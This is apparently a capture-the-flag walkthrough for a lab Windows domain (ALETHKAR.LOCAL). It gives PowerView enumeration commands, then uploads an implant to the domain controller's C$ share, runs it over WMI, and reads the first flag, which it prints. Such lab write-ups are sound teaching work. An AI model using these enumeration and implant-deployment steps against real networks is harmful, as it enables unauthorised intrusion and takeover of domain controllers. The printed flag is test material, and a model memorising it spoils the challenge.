Post

BOFA CTF

🎯 Mission Briefing: Initial Reconnaissance Mission Overview:

You’ve been assigned to gather intel on ALETHKAR.LOCAL domain, where rumors suggest nefarious activities are underway. Your primary objective is to use the ALETHKAR\Dalinar account to perform domain enumeration, laying the groundwork for further infiltration.

πŸ“œ Task 1: PowerView Importation Begin by importing the PowerView.ps1 script into your PowerShell session. This powerful reconnaissance tool will allow you to gather vital information about the domain.

Command:

1
2
PowerShellImport
Upload the PowerView.ps1 file when prompted.

πŸ›  Task 2: Domain Enumeration With PowerView now loaded, use it to gather information about the computers and users in the ALETHKAR.LOCAL domain.

Commands:

1
2
powershell Get-DomainComputer -Properties name
powershell Get-DomainUser -Identity "Dalinar"

🚩 Flag Discovery: The Domain Admin Your enumeration reveals that ALETHKAR\Dalinar is a member of the Domain Admins group, granting you elevated privileges. With this knowledge, your next step is to explore DC-1, the domain controller.

Upload and execute a Grunt implant on DC-1 using Windows Management Instrumentation (WMI).

Command:

1
2
Upload /filepath:"\\dc-1\C$\46eb39ca41.exe"
WMICommand dc-1 c:\46eb39ca41.exe

πŸ” Task 3: Host Enumeration With your Grunt successfully deployed on DC-1, begin exploring the file system to uncover further intel.

Commands:

1
2
3
4
5
6
7
8
Copy code
cd C:\Users
ls
cd Dalinar
ls
cd Desktop
ls
cat flag1-1.txt

🏁 Flag 1 Located: After navigating through Dalinar’s directories, you discover flag1-1.txt. Reading its contents reveals your first flag:

Flag: a791523cdf17403d8c8890532efd4c55 Submit this flag to the scoring server to complete your mission and proceed to the next challenge.

Good work, agent! Your reconnaissance skills have paved the way for deeper infiltration.

This post is licensed under CC BY 4.0 by the author.